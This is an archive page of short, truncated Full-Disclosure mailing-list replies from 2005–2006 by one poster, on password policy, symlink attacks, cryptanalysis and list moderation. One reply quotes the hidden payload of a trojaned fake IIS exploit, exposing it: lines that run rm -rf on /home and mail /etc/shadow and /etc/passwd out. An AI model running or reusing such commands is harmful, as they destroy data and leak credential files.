Re: [Full-disclosure] guidelines for good password policy and maintenance / user centric identity with single passwords (or a small number at most over time)

2006-03-26 Thread James Longstreet
On Mar 26, 2006, at 12:12 PM, Anders B Jansson wrote: And even then they fail the actual user has a gun at his temple. Frankly, this is true of just about any authentication scheme. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok

Re: [Full-disclosure] strange domain name in phishing email

2006-03-15 Thread James Longstreet
This was brought up in 2600 years ago, as a way of bypassing content filters that blocked 2600.com (as long as they only blocked by URL). Interestingly enough, on the Summer 2000 cover (http://www.2600.com/covers/fa001.gif), the cell phone displays the decimal equivalent of 2600.com's IP address,

Re: [Full-disclosure] BANTOWN PRESENTS: Give me 0day or give me death

2005-12-18 Thread James Longstreet
Bantown is like FYAD if FYAD wasn't funny On Dec 17, 2005, at 11:26 PM, Andrew A wrote: Because of my philosophical leanings, I have made the assumption that freedom of speech and expression is an inalienable right granted by nature's God. I have made the extension to this statement that t

Re: [Full-disclosure] a call for full-disclosure to become a moderatedlist

2005-12-16 Thread James Longstreet
On Dec 16, 2005, at 5:55 PM, Michael Evanchik wrote: I second this There's no point discussing it, or holding it to a vote. The purpose of this list is to be unmoderated. The list owner has stated over and over that that is the one point he will not concede on. Kurt Seifried, among ot

Re: [Full-disclosure] Symlink attack techniques

2005-12-15 Thread James Longstreet
On Dec 15, 2005, at 7:09 AM, Werner Schalk wrote: Ok I should have been more precise in my previous mail. In this scenario I don't have control over the output generated by the find command. So basically the cronjob is something like: 15 4 * * 6 root /usr/bin/find /home/userA -type f -pri

Re: [Full-disclosure] linux-ftpd-ssl 0.17 warez

2005-11-06 Thread James Longstreet
ust to clarify, this bug only affects the SSL patch, but that is quite commonly used. -James Longstreet On Nov 4, 2005, at 8:49 PM, kcope wrote: hello this is kcope, i got juarez for you.. lnxFTPDssl_warez.c is a remote r00t exploit for the latest version of linux-ft

Re: [Full-disclosure] Comparing Algorithms On The List OfHard-to-brut-force?

2005-11-01 Thread James Longstreet
On Nov 1, 2005, at 12:11 PM, Brandon Enright wrote: IIRC, there aren't any good known attacks against Blowfish, AES, or Twofish so the *RIGHT* algorithm is whatever works best for your application. Depending on the situation, there may be a feasible cache-timing attack on software impleme

Re: [Full-disclosure] Motorist wins case after maths whizzes break speed camera code (fwd)

2005-08-11 Thread James Longstreet
On Wed, 10 Aug 2005, J.A. Terranson wrote: > Mr Mirabilis yesterday said he had received more than 100 inquiries > from motorists anxious to use the same defence. "People have shown it > [the algorithm] has been hacked and it's open to viruses." MD5 has viruses?!?! 7122cdcf85cef9500687fb0e5e08fa

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread James Longstreet
On Wed, 10 Aug 2005, Ahmad N wrote: > can anybody suggest a website??? http://www.sourceforge.net/ There's hundreds of 0-days there. They're pretty well hidden though, you'll have to do a lot of inspection to find them. ___ Full-Disclosure - We belie

RE: [Full-disclosure] Rooting Linux with a floppy

2005-07-15 Thread James Longstreet
On Fri, 15 Jul 2005, Lauro, John wrote: > 6.2? What is that??? Latest kernel is 2.6... No, not kernel 6.2, LINUX 6.2. You know, that old version. Linux 10 has been out for months. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.o

Re: [Full-disclosure] Windows IPSec Vulnerabilty - still exist

2005-06-23 Thread James Longstreet
Translation for the lazy: http://www.myfreeshares.com/click.php?adcode=1119376798&user=051206401447 http://www.myfreeshares.com/click.php?adcode=1118753072&user=051206401447 Everyone loves pyramid schemes. On Thu, 23 Jun 2005 [EMAIL PROTECTED] wrote: > hi list again > foregive me for my wrong U

RE: [Full-disclosure] Not even the NSA can get it right

2005-05-25 Thread James Longstreet
On Wed, 25 May 2005, Castigliola, Angelo wrote: > Don't think a hacker could do much with this. At best someone could try > to use the exploit to phish passwords from NSA.GOV employees. That's not a problem? ___ Full-Disclosure - We believe in it. Chart

Re: [Full-disclosure] OpenServer 5.0.6 OpenServer 5.0.7 : chroot A known exploit can break a chroot prison.

2005-05-11 Thread James Longstreet
On Wed, 11 May 2005 [EMAIL PROTECTED] wrote: Has anyone ever wondered why SCO's mails come from [EMAIL PROTECTED] Why not just make them come from [EMAIL PROTECTED] Or at least set the Reply-To: field? Other than preventing spam, is there a greater purpose here that I'm missing?

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)

2005-04-20 Thread James Longstreet
Cute. shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe" launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk " netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk " On Wed, 20 Apr 2005, Day Jay wrote: > Sorry, the previous code was broken. This code sh

Re: [Full-disclosure] Reverse engineering the Windows TCP stack

2005-03-24 Thread James Longstreet
On Thu, 24 Mar 2005, Tim wrote: > Last I read, the license requires credit be given where credit is due. > Maybe I missed it, but I haven't ever seen that credit be given in the > documentation shipped with Windoze. I don't know if it's credit per se, but I just ran strings on XP's finger.exe: >